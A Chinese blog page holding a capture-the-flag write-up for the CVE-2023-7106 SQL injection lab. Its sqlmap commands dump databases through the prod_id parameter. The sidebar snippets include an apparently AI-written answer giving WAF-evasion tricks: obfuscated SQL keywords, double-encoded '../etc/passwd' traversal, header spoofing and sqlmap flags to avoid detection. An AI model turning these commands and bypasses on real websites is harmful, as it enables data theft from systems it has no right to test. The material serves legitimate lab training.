【春秋云镜】CVE-2023-7106标靶Wp

最新推荐文章于 2025-11-30 22:51:32 发布
原创 最新推荐文章于 2025-11-30 22:51:32 发布 · 751 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络安全 #web安全

文章讲述了如何使用SQL注入工具SQLmap对一个名为product_details.php的页面进行操作,包括获取当前数据库、查询库名、查找表并尝试获取Flag。作者展示了在prod_id参数下执行的一系列攻击步骤。

0x01:漏洞点

老样子先,看看标题介绍奥

ok了解到了 我们现在要知道参数是prod_id,路径为/pages/product_details.php

0x02:操作

直接打开SQLmap一把梭

sqlmap -u {URL}/pages/product_details.php?prod_id=1 --current-db

这里的是查看数据库,奥

这里的话当前库是MySQL,后面实际测的时候那个库在electricks里面

sqlmap -u {URL}/pages/product_details.php?prod_id=1 --dbs

这串就是查询库名

然后直接查询表

sqlmap -u {URL}/pages/product_details.php?prod_id=1 -D electricks --tables

直接爆出来吧我的Flag!!!!!

sqlmap -u {URL}/pages/product_details.php?prod_id=1 -D electricks -T flllaaaag --dump

精选资源
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
春秋CVE-2022-4230 夺旗
05-02
### 春秋CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋 CVE-2023-7106
qq274575499的博客
04-10 871
E-Commerce Website 1.0 允许通过“/pages/product_details.php”中的参数“prod_id”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
春秋CVE-2023-7106
2303_76653367的博客
03-28 417
E-Commerce Website 1.0 允许通过“/pages/product_details.php”中的参数“prod_id”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
春秋境 | SQL | CVE-2023-7106
weixin_68416970的博客
08-12 831
E-Commerce Website 1.0 允许通过“/pages/product_details.php”中的参数“prod_id”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
春秋 CVE-2023-7107 页面设置了cookie验证的sql注入
qq274575499的博客
04-10 1462
E-Commerce Website 1.0 允许通过“/pages/user_signup.php”中的参数‘firstname’、‘middlename’、‘email’、‘address’、‘contact’和‘username’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
春秋CVE-2023-7107
2303_76653367的博客
05-09 795
3.保存POST包到sqlmap里跑,设置user-agent与cookie,爆库。2.填写注册信息并抓包。
春秋 CVE-2023-23752(Joomla未授权访问漏洞)
M372109150的博客
05-01 832
Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。在其4.0.0版本到4.2.7版本中,存在一处属性覆盖漏洞,导致攻击者可以通过恶意请求绕过权限检查,访问任意Rest API。
春秋CVE-2023-2130漏洞复现exp
m0_74786138的博客
06-09 588
​ 在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。影响版本SourceCodester采购订单管理系统 1.0。
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
春秋境靶场之CVE-2023-7107
sjh0590的博客
09-19 670
春秋境靶场之CVE-2023-7107的攻克过程
CVE-2023-7107
m0_74347812的博客
04-23 302
提示说的是在E-Commerce Website 1.0 允许通过“/pages/user_signup.php”中的参数‘firstname’、‘middlename’、‘email’、‘address’、‘contact’和‘username’进行 SQL 注入。save item保存,(发现目标设置了 Cookie 身份认证,使用 sqlmap 时需写入 Cookie,同时添加 User - Agent 字段,防止因明显的 sqlmap 客户端标识被识别,导致攻击中断)得到列名flag,爆字段。
春秋境 | SQL | CVE-2023-7107
weixin_68416970的博客
08-11 720
E-Commerce Website 1.0 允许通过“/pages/user_signup.php”中的参数‘firstname’、‘middlename’、‘email’、‘address’、‘contact’和‘username’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
春秋CVE-2023-52064标靶Wp
KKleeeaa的博客
04-01 983
因为这个是WuZhiCMS,然后这里刚好我的博客里面介绍了有一个Day,不知道的小伙半,可以看看我的漏洞复现的文章,里面有个五指CMS的文章哦。这里抓包 把GET数据包 用SQLmap跑,这里注意下,GET数据包里,keyword=1* 其余删掉 后面的。然后直接上Day,有day就打day奥,打出来数据库为wuzhicms,不用我多说了吧直接flag展示奥。弱密码自己猜测奥,锻炼你自己,可以通过信息收集查询奥,小伙伴们加油!输入来篡改SQL语句的结构,执行恶意的SQL命令。这里直接弱密码,尝试进去后台。
MySQL 的mysql_secure_installation安全脚本执行过程介绍
2509_94231173的博客
11-30 615
1.设置 MySQL root 用户密码。2.删除匿名用户。3.禁止 root 用户远程登录。4.删除测试数据库。5.重新加载权限表。
【技术深度】【安全】Remote Password Protection:一套密码永不上传的登录协议方案(含盲签 + Pairing + Crypto 模块)
ZFJ_张福杰
11-30 745
本文提出了一套"密码永不上传"的高安全登录协议方案Remote Password Protection。该方案通过密码盲化、双线性映射和主密钥混合三项核心技术,确保服务端无法获取用户密码及哈希值,即使数据库泄露也无法暴力破解。系统包含客户端、业务服务器和密码服务(Crypto)三个角色,Crypto模块通过硬件安全模块(HSM)保护主密钥。文章详细阐述了基础注册登录流程、增强版(加入Token和安全通道)以及旧系统升级方案三种实现方式,并提供了完整的数学公式推导。该方案适用于交易所、银行
Java安全基础——JNI安全基础
a1001086的博客
11-29 487
Java通过JNI实现与C/C++的交互,可在Java中调用本地代码。具体步骤包括:1)声明native方法;2)加载动态链接库(.dll/.so);3)使用javac生成头文件;4)实现C/C++函数;5)编译生成动态库;6)在Java中调用。JNI类型对应C++类型,基本类型直接使用,引用类型为对象指针。处理字符串时需注意内存管理,使用GetStringUTFChars获取字符串指针,最后调用ReleaseStringUTFChars释放资源。该方法可扩展Java功能,但需考虑跨平台和安全问题。
SSH 深度实战:从基础到高级安全配置
最新发布
1024
11-30 421
本文全面介绍了 SSH 协议的核心技术与安全实践。主要内容包括:SSH 基础连接与密钥认证管理(RSA/ECDSA/ED25519 密钥生成与分发);服务器端安全配置(端口更改、root 登录禁用、Fail2Ban 防护);高级功能如端口转发(本地/远程/SOCKS 代理)、连接复用和代理转发;以及安全的文件传输方法(SCP/SFTP)。
【探索实战】监控、安全与边缘场景的深度落地
行者的博客
11-29 866
Kurator作为一站式分布式原生平台,在统一监控、安全策略和边缘计算场景中展现出显著优势。文章从监控体系搭建、安全策略实施和边缘计算实战三个维度,分享了Kurator的进阶使用经验。通过Thanos实现跨集群监控聚合,Grafana提供全局可视化,将巡检时间从30分钟缩短至5分钟;利用Kyverno集成实现统一安全策略管理,大幅降低合规成本;在制造业边缘场景中,Kurator的离线部署和弱网同步能力解决了车间网络不稳定问题,使边缘集群部署时间缩短90%。Kurator有效降低了分布式原生管理复杂度,是
春秋cve-2023-7130被拦截
10-31
<think>嗯,用户询问的是春秋靶场中"CVE-2023-7130"被拦截的原因及解决方法。这个编号看起来不太常见,需要谨慎验证。 从用户提供的引用材料来看,春秋平台主要复现各类Web漏洞,涉及SQL注入、目录遍历等问题。引用[3]提到靶场会设置安全机制拦截sqlmap等工具,这可能是关键线索。虽然用户提到的CVE编号在公开漏洞库中查不到,但编号格式接近2023年的漏洞,考虑可能是靶场自定义的模拟漏洞。 被拦截的可能原因主要有三个层面:首先是WAF规则,商业WAF会识别常见攻击特征;其次是靶机自身防护,比如引用[1]提到的参数过滤机制;最后是靶场平台限制,像引用[3]那样会检测扫描工具。 解决方法需要分层突破:对于WAF拦截,引用[4]展示的nginx绕过技术值得参考;靶机防护方面可借鉴引用[3]的sqlmap参数组合;如果遇到平台拦截,可能需要人工测试。特别要注意用户提到的编号可能是靶场内部编号,建议用户确认具体漏洞类型。 用户能精准引用四个漏洞资料,应该是具备一定渗透测试基础的。但要注意提醒漏洞编号的准确性,避免产生误导。最后补充建议时强调靶场环境与实际环境的差异,这样的回复会比较全面。 </think>关于春秋靶场中 **CVE-2023-7130** 被拦截的原因及解决方法,结合漏洞特征和靶场防护机制,分析如下: --- ### **被拦截的可能原因** 1. **WAF(Web应用防火墙)规则触发** 靶场通常部署WAF(如阿里盾、腾讯WAF),会检测以下特征: - **恶意负载特征**:若模拟攻击包含如 `UNION SELECT`、`SLEEP()`、`OR 1=1` 等SQL注入关键词,或 `../`、`/etc/passwd` 等路径遍历特征,会被规则库直接拦截。 - **异常流量模式**:高频请求、非常规HTTP方法(如PUT)、非常规Content-Type可能触发流量模型分析。 2. **靶机自身防护机制** - **输入过滤**:漏洞利用需构造特定参数(如 `id=1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--`),若靶机代码已修复过滤逻辑(如转义单引号),攻击会失效。 - **权限限制**:某些漏洞需特定会话状态(如管理员Cookie),若未正确模拟登录态,请求会被拒绝。 3. **靶场平台限制** - **扫描工具识别**:使用 `sqlmap` 等工具时,若未配置 `--random-agent` 或 `--proxy` 参数,其默认User-Agent会被识别并拦截(参考引用[^3])。 - **路径规范化绕过失败**:如Grafana漏洞利用需多层 `../` 绕过nginx路径清洗,构造不当会导致请求被标准化处理(参考引用[^4])。 --- ### **解决方法(分层绕过)** #### **1. 绕过WAF检测** - **混淆攻击载荷**: - SQL注入:改用 `/*!50000SELECT*/`(MySQL注释语法)、`CHAR()`编码字符串。 - 路径遍历:双重URL编码路径(如 `..%252f..%252fetc/passwd`)。 - **修改请求特征**: - 添加非常规HTTP头(如 `X-Forwarded-For: 127.0.0.1`)。 - 拆分攻击载荷到多个参数或Cookie中。 - **降低扫描速度**:在工具中设置延迟参数(如sqlmap的 `--delay=2`)。 #### **2. 适应靶机防护** - **精准漏洞验证**: - 确认漏洞利用点是否与引用[^1][^2]一致,例如检查 `/admin/suppliers/view_details.php?id=` 参数是否存在。 - 先用简单载荷测试(如 `id=1'` 观察报错)。 - **模拟合法会话**: - 捕获登录后的Cookie或Token,在攻击请求中附带(参考引用[^3])。 #### **3. 绕过靶场限制** - **工具配置优化**: ```bash sqlmap -u "http://target.com/vuln?id=1" --proxy=http://127.0.0.1:8080 --random-agent --batch --cookie="PHPSESSID=abc123" ``` - `--proxy`:通过Burp Suite代理观察请求是否被篡改。 - `--random-agent`:伪装浏览器UA避免工具指纹识别(参考引用[^3])。 - **手动构造请求**: 使用Burp Repeater手动测试,逐步调整载荷(如替换空格为 `/**/`)。 --- ### **排查建议流程** ```mermaid graph LR A[拦截现象] --> B{查看响应代码} B -->|403/406| C[触发WAF规则] B -->|500| D[靶机未解析载荷] C --> E[混淆攻击载荷] D --> F[检查语法有效性] F -->|语法错误| G[修正特殊字符] F -->|语法正确| H[验证漏洞存在性] ``` --- ### **注意事项** 1. CVE编号 **CVE-2023-7130** 暂未在官方漏洞库(如NVD)中收录,需确认是否为靶场自定义漏洞编号。 2. 靶场环境可能存在**时间限制**或**访问频率控制**,高频请求会触发临时封禁。 3. 若仍失败,尝试更换漏洞利用链(如结合文件上传+目录遍历,参考引用[^2][^4])。 > **提示**:春秋靶场通常模拟真实环境防护,需综合运用混淆、代理、会话维持等技术。建议先用低危操作(如时间延迟注入)验证漏洞可行性,再逐步深入[^1][^3]。 --- ### 相关问题 1. 如何判断WAF拦截规则并针对性绕过? 2. 在无工具情况下如何手动验证SQL注入漏洞? 3. 靶场中常见的权限维持方法有哪些? 4. 如何区分漏洞修复失败和攻击载荷构造错误? [^1]: 采购订单系统SQL注入漏洞分析 [^2]: Struts2文件上传漏洞利用链 [^3]: SQLMap绕过靶场检测的实战参数 [^4]: Nginx路径规范化绕过技巧
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值